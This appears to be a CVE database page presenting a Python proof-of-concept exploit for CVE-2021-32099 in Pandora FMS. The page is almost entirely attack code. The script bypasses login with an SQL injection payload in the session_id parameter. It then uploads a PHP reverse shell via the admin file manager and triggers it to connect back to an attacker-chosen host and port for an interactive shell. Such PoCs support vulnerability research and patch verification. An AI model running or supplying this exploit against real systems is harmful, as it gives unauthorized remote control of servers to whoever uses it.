4837 Total CVEs
26 Years
GitHub
Home / 2021 / CVE-2021-32099
README.md
Rendering markdown...
POC / CVE-2021-32099.py PY
⬇ Raw GitHub ✕ Close 
import argparse
import requests
from pwn import *

class PandoraFmsClient:
    def __init__(self, url):
        self.__url = url
        self.__session = requests.Session()

    def bypass_authentication(self):
        print("[\033[1;32m+\033[0m] Bypassing authentication...", end='')
        sqli = "1' union SELECT 1,2,'id_usuario|s:5:\"admin\";' -- -"
        self.__session.get(f"{self.__url}/pandora_console/include/chart_generator.php?session_id=a{sqli}")
        if 'var id_user = "admin";' in self.__session.get(f"{self.__url}/pandora_console/").text:
            print("OK")
        else:
            print("ERROR")
            exit(1)

    def upload_reverse_shell(self):
        print("[\033[1;32m+\033[0m] Uploading reverse shell...", end='')
        reverse_shell_file = "reverse_shell.php"
        with open(reverse_shell_file, "r") as f:
            data = {
                "umask": "",
                "decompress_sent": "1",
                "go": "Go",
                "real_directory": "/var/www/pandora/pandora_console/images",
                "directory": "images",
                "hash": "6427eed956c3b836eb0644629a183a9b",
                "hash2": "594175347dddf7a54cc03f6c6d0f04b4",
                "upload_file_or_zip": "1"
            }
            files = {
                "file": (reverse_shell_file, f)
            }
            response = self.__session.post(f"{self.__url}/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager", data=data, files=files)
            if reverse_shell_file in response.text:
                print("OK")
            else:
                print("ERROR")
                exit(1)

    def execute_reverse_shell(self, lhost, lport):
        trigger_thread = threading.Thread(
            target=self.__execute_reverse_shell,
            kwargs={"lhost": lhost, "lport": lport}
        )
        trigger_thread.start()

    def __execute_reverse_shell(self, lhost, lport):
        print("[\033[1;32m+\033[0m] Executing reverse shell...")
        self.__session.get(f"{self.__url}/pandora_console/images/reverse_shell.php?lhost={lhost}&lport={lport}")

def parse_args():
    parser = argparse.ArgumentParser(
        prog=f"python3 {sys.argv[0]}",
        epilog=f"Example:\npython3 {sys.argv[0]} --target http://target.com --lhost 10.10.14.157 --lport 4444",
        add_help=False
    )
    parser.add_argument("--target", help="Full URL of the vulnerable Pandora FMS instance.")
    parser.add_argument("--lhost",help="IP address where the reverse shell will connect back to (must be reachable by the target). The listener will bind to 0.0.0.0 internally.")
    parser.add_argument("--lport", help="Port number the reverse shell listener will bind to.")
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)
    return parser.parse_args()

def main():
    args = parse_args()
    pandora_fms_client = PandoraFmsClient(args.target)
    pandora_fms_client.bypass_authentication()
    pandora_fms_client.upload_reverse_shell()
    listener = listen(int(args.lport))
    sleep(1)
    pandora_fms_client.execute_reverse_shell(args.lhost, args.lport)
    connection = listener.wait_for_connection()
    connection.interactive("")

if __name__ == "__main__":
    main()